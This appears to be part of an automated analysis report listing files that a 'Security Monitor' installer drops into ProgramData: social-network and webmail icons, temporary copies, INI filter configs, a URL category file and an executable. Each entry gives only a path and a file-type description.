PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\GMX.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Gmail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.RU.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook.Live.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yahoo Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yandex Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\facebook.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\google+.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\imp.free.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\instagram.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-1FFV7.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-2P74D.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-4PCT5.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-5UTJ2.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-61H5U.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-62KR8.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-79SIE.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-C8SQH.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-CO8KR.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-D2CD5.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-IHOV2.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-LMU5U.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-LPTRG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-M94JL.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-MOF9G.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-NBAFM.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-NF1DG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-OA0RJ.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-PBDSP.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-Q9CC4.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-S9N3N.tmp
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-UMLKQ.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-UN8L1.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-VG8HL.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\linkedin.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.png (copy)
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\messagerie.orange.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\my.screenname.aol.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\myspace.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\odnoklassniki.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\qqzone.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter_.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\vkontakte.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\youtube.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\SNets.ini (copy)
|
Generic INItialization configuration [Instagram]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki.ini (copy)
|
Generic INItialization configuration [Marks]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\About.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Guests.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Marks.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Photos.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Profiles.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-5VF8C.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-7QJJ3.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-EV84R.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-I55C6.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-JQ74U.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-SATEB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte.ini (copy)
|
Generic INItialization configuration [Friends]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Messages.png (copy)
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Notifications.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Replies.png (copy)
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-15P39.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-21EO6.tmp
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-IKQ7D.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-LGHO3.tmp
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook.ini (copy)
|
Generic INItialization configuration [News]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Apps.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Events.png (copy)
|
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Facebook Ads.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Find friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends List.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Gifts.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Groups.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Invite friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Messages.png (copy)
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\News.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Notifications.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Payments.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Privacy.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Security.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Settings.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Subscribers.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Welcome.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-0FLQ6.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-17G87.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-1A72T.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-1MKF6.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-4AD6P.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-4KPTH.tmp
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-5SAC9.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-8BHRF.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-8CTU4.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-ATSIL.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-ERNNR.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-FRQB7.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-IVL6J.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-K2SLJ.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-M0D24.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-O1D76.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-Q2FK3.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-VC4DR.tmp
|
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-DP90R.tmp
|
Generic INItialization configuration [Marks]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-IAQ3P.tmp
|
Generic INItialization configuration [News]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-KSHIB.tmp
|
Generic INItialization configuration [Friends]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-E95CV.tmp
|
Generic INItialization configuration [Instagram]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-UOAON.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\is-M1G1D.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\is-133PP.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\SearchEn.ini (copy)
|
Generic INItialization configuration [Bing]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\is-AO39N.tmp
|
Generic INItialization configuration [Bing]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\is-SUR0N.tmp
|
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\url_cat (copy)
|
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\iMsgInfo.bmp (copy)
|
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
|
